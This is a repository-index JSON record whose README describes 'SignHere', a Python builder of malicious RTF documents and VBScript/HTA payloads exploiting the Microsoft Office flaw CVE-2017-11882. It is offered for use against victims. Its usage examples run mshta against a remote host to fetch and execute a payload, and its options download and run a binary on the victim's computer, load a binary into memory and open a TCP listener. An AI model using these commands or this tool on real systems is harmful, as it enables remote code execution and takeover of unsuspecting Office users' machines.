{"id":13845699,"url":"https://github.com/Retr0-code/SignHere","last_synced_at":"2025-07-12T03:31:47.520Z","repository":{"id":191614286,"uuid":"332744031","full_name":"Retr0-code/SignHere","owner":"Retr0-code","description":"SignHere is implementation of CVE-2017-11882. SignHere is builder of malicious rtf document and VBScript payloads.","archived":false,"fork":false,"pushed_at":"2021-01-26T16:29:27.000Z","size":46,"stargazers_count":5,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-08-05T17:45:04.748Z","etag":null,"topics":["automation","build-tool","builder","cve","cve-2017-11882","equation","malicious","microsoft","office","python3","rtf","vulnerabilities"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Retr0-code.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2021-01-25T12:44:03.000Z","updated_at":"2023-02-12T18:04:41.000Z","dependencies_parsed_at":null,"dependency_job_id":"26de697f-5ddf-4a36-aa32-983a93c5480b","html_url":"https://github.com/Retr0-code/SignHere","commit_stats":null,"previous_names":["retr0-code/signhere"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Retr0-code%2FSignHere","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Retr0-code%2FSignHere/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Retr0-code%2FSignHere/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Retr0-code%2FSignHere/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Retr0-code","download_url":"https://codeload.github.com/Retr0-code/SignHere/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225791384,"owners_count":17524774,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["automation","build-tool","builder","cve","cve-2017-11882","equation","malicious","microsoft","office","python3","rtf","vulnerabilities"],"created_at":"2024-08-04T17:03:33.552Z","updated_at":"2024-11-21T19:30:31.116Z","avatar_url":"https://github.com/Retr0-code.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"## SignHere\n# Introduction\n\n\u003cb\u003eCVE-2017-11882\u003c/b\u003e - The unique vulnerability identifier of Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allows an attacker to run code in the context of the current user without properly handling objects in memory, the so-called \"Microsoft Office Memory corruption vulnerability\".\nThe implementation includes creating a program for building malicious rtf documents and payloads in VBScript\n\n\u003cb\u003eThe principle of operation\u003c/b\u003e\n--\nIt is rtf documents that are vulnerable for the reason that they can be \"programmed\" by knowing special commands-RTF Headers. Thus, a binary (executable) object is created in the body of the document, in fact, it is a Microsoft Equation formula with the code that contains the cmd command. Then you can generate the payload in VBScript and use the command \" mshta link to the payload file” to execute the hta file.\n\n\u003cbr\u003e\n\n# Attention!\nAuthor and contributors \u003cb\u003eare not responsible\u003c/b\u003e for any damage caused to you or by you.\n\n## Installation\nThe program requires [Python 3](https://www.python.org) for executing.\n--\n\u003cb\u003eLinux\u003c/b\u003e\n--\nYou can use \u003cb\u003eTermux\u003c/b\u003e, but execution of program requires \u003cb\u003eroot\u003c/b\u003e\n\n```sh\ngit clone https://github.com/Retr0-code/SignHere/\ncd SignHere/\nchmod +x SignHere.py\n./SignHere.py --help\n```\n\u003cbr\u003e\n\n\u003cb\u003eWindows\u003c/b\u003e\n--\nFirst, you need to download the [archive](https://github.com/Retr0-code/SignHere/archive/main.zip). Then unpack it and open a PowerShell window in this folder and write:\n```sh\n.\\SignHere.py --help\n```\n\n## Usage\n\n```python\n./SignHere.py --cmd \"mshta http://192.168.1.74/pay.hta\" --powershell \"start iexplore.exe https://github.com/Retr0-code/SignHere\" --ip 192.168.1.74 --output generated.rtf\n```\n\n\u003cb\u003e--cmd\u003c/b\u003e\nArgument with Windows command that will be executed after opening document.\n\n\u003cb\u003e--powershell\u003c/b\u003e\nArgument with powershell command that will be in VBScript payload.\n\n\u003cb\u003e--ip\u003c/b\u003e\nArgument with ip address that will be used for web-server. (default: 127.0.0.1)\n\n\u003cb\u003e--output\u003c/b\u003e\nName and path of document.\n\n\u003cbr\u003e\n\n```python\n./SignHere.py --cmd \"mshta http://192.168.1.74/pay.hta\" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf\n```\n\n\u003cb\u003e--temp\u003c/b\u003e\nArgument that will use binary file as payload (binary file will start in RAM memory).\n\n\u003cbr\u003e\n\n```python\n./SignHere.py --cmd \"mshta http://192.168.1.74/pay.hta\" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf\n```\n\n\u003cb\u003e--payload\u003c/b\u003e\nArgument that will download file on computer of victim and execute it.\n\n\u003cb\u003e--listener-host\u003c/b\u003e\nArgument for starting TCP listener on current ip (default: 127.0.0.1)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRetr0-code%2FSignHere","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FRetr0-code%2FSignHere","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRetr0-code%2FSignHere/lists"}